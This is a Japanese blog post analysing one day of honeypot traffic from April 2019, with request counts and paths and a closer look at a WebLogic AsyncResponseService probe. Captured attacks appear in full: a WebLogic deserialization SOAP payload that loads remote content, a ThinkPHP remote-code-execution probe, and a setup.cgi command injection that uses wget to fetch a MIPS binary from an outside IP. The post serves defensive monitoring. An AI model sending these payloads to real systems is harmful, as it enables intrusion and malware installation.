honeypotの簡易解析27日目

2019-04-27のアクセス数は67件でした。

■送信元IPアドレスの数は 51件です。

■メソッドの一覧と件数は以下です。

method総数
GET60
POST7
合計 結果67

■アクセスパス一覧と件数は以下です。

pathmethod総数
/ GET45
/_async/AsyncResponseServicePOST1
/cgi-bin/authLogin.cgiGET3
/Lists/admin.phpGET1
/manager/htmlGET1
/setup.cgi?next_file=afr.cfg&todo=syscmd&cmd=wget%
20http://104.248.90.255/Polini.mips%20-O%20/var/tmp/Polini.mips
GET2
/tmUnblock.cgiPOST2
/TP/public/index.phpGET2
/TP/public/index.php?s=captchaPOST2
/TP/public/index.php?s=index/\think\app/invokefunction&
function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
GET1
/users?page=&size=5POST2
http://110.249.212.46/testget?q=23333&port=80GET5

気になるlog

-=-=63件目のlog=-=-

[2019-04-27 22:40:03+0900] 1.246.220.121 hoge:80 "POST /_async/AsyncResponseService HTTP/1.1" 200 False
POST /_async/AsyncResponseService HTTP/1.1
 Host: hoge
 Connection: keep-alive
 Accept-Encoding: gzip, deflate
 Accept: /
 User-Agent: python-requests/2.21.0
 content-type: text/xml
 Content-Length: 634
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</string>
<void><string>http://ximcx.cn</string></void>
</class></java>    
</work:WorkContext>   
</soapenv:Header>   
<soapenv:Body>      <asy:onAsyncDelivery/>   </soapenv:Body>
</soapenv:Envelope>

0dayきたーーーーーーーーー!

CNVD-C-2019-48814はweblogicの脆弱性です!

User-Agentが”python-requests/2.21.0”なので、PoC流用っぽいかなーと思ったらドンピシャなPoCすぐに見つかりました。

PoCというより実際の攻撃コードの可能性が高いです。

そのコードは1ページに複数あり、親切に中国語、ウズベク語、英語で記載されています。

スクリプトキディが使い回ししやすい用にばら撒いたのかな?だとすると真の目的は別にあり、陽動が目的かもしれないですね!!

で、今回の通信は、調査の様です。

そのコードを見ると、IPアドレスlistに対して、PoCを投げ、StatusCodeが”202″の場合、IPアドレスリストに”wls9-asyncの脆弱性が存在する”と追記します。

つまり、202を返してやるようにしておけば、脆弱IPリストに乗るので、次の攻撃が観測できるはずです。

4件のコメント

    1. what do you mean?
      I think that PoC has been abused as a survey.

      “1.246.220.121” is your survey IP?

      1. 不是我的IP, 我的意思 我感觉这个IP的人应该是在做探测,因为这个代码不是攻击代码。

返信を残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です